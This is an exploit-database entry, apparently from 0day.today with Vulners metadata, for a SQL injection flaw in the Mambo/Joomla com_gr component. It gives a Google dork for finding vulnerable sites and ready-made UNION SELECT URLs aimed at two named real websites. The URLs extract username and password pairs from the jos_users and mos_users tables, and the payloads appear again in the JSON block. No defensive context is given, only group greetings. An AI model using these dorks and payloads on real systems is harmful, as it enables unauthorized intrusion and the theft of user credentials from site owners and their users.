Search...

Mambo / Joomla Component com_gr SQL Injection Vulnerability

2010-08-22T00:00:00

ID 1337DAY-ID-13778
Type zdt
Reporter _aL_bayraqim_
Modified 2010-08-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================================
Mambo / Joomla Component com_gr SQL Injection Vulnerability
===========================================================


Author :   _aL_Bayraqim_  
   
Homepage : http://www.1923turk.com

..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!
   
=================================================== 
[+]G00gle Dork :index.php?option=com_gr

[+] Vulnerable File :
   
   
http://www.ameixoeiradigital.com//index.php?option=com_gr&task=area&tipo=1&Itemid=26&area=1[SQL]  

   
[+] ExploiT : 
   
http://www.ameixoeiradigital.com//index.php?option=com_gr&task=area&tipo=1&Itemid=26&area=1+order+by+2--
  

http://www.ameixoeiradigital.com//index.php?option=com_gr&task=area&tipo=1&Itemid=26&area=1+union+select+1,2-- 
 
 
http://www.ameixoeiradigital.com//index.php?option=com_gr&task=area&tipo=1&Itemid=26&area=1+union+select+1,concat(username,0x3a,password)+from+jos_users--  
[+]

Mambo Component (com_gr) SQL Injection Vulnerability 

http://www.altadelisboadigital.com//index.php?option=com_gr&task=area&tipo=2&Itemid=28&area=-1+union+select+1,concat(username,0x3a,password)+from+mos_users--
=================================================== 

===================================================  
   
Greetz : 1923Turk All Users 



#  0day.today [2018-04-09]  #

JSON Vulners Source

Initial Source

{"published": "2010-08-22T00:00:00", "id": "1337DAY-ID-13778", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-04-10T00:30:02", "rev": 2}, "dependencies": {"references": [], "modified": "2018-04-10T00:30:02", "rev": 2}, "vulnersScore": 0.1}, "type": "zdt", "lastseen": "2018-04-10T00:30:02", "edition": 2, "title": "Mambo / Joomla Component com_gr SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/13778", "modified": "2010-08-22T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/13778", "references": [], "reporter": "_aL_bayraqim_", "sourceData": "===========================================================\r\nMambo / Joomla Component com_gr SQL Injection Vulnerability\r\n===========================================================\r\n\r\n\r\nAuthor : _aL_Bayraqim_ \r\n \r\nHomepage : http://www.1923turk.com\r\n\r\n..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!\r\n \r\n=================================================== \r\n[+]G00gle Dork :index.php?option=com_gr\r\n\r\n[+] Vulnerable File :\r\n \r\n \r\nhttp://www.ameixoeiradigital.com//index.php?option=com_gr&task=area&tipo=1&Itemid=26&area=1[SQL] \r\n\r\n \r\n[+] ExploiT : \r\n \r\nhttp://www.ameixoeiradigital.com//index.php?option=com_gr&task=area&tipo=1&Itemid=26&area=1+order+by+2--\r\n \r\n\r\nhttp://www.ameixoeiradigital.com//index.php?option=com_gr&task=area&tipo=1&Itemid=26&area=1+union+select+1,2-- \r\n \r\n \r\nhttp://www.ameixoeiradigital.com//index.php?option=com_gr&task=area&tipo=1&Itemid=26&area=1+union+select+1,concat(username,0x3a,password)+from+jos_users-- \r\n[+]\r\n\r\nMambo Component (com_gr) SQL Injection Vulnerability \r\n\r\nhttp://www.altadelisboadigital.com//index.php?option=com_gr&task=area&tipo=2&Itemid=28&area=-1+union+select+1,concat(username,0x3a,password)+from+mos_users--\r\n=================================================== \r\n\r\n=================================================== \r\n \r\nGreetz : 1923Turk All Users \r\n\r\n\n\n# 0day.today [2018-04-09] #", "immutableFields": []}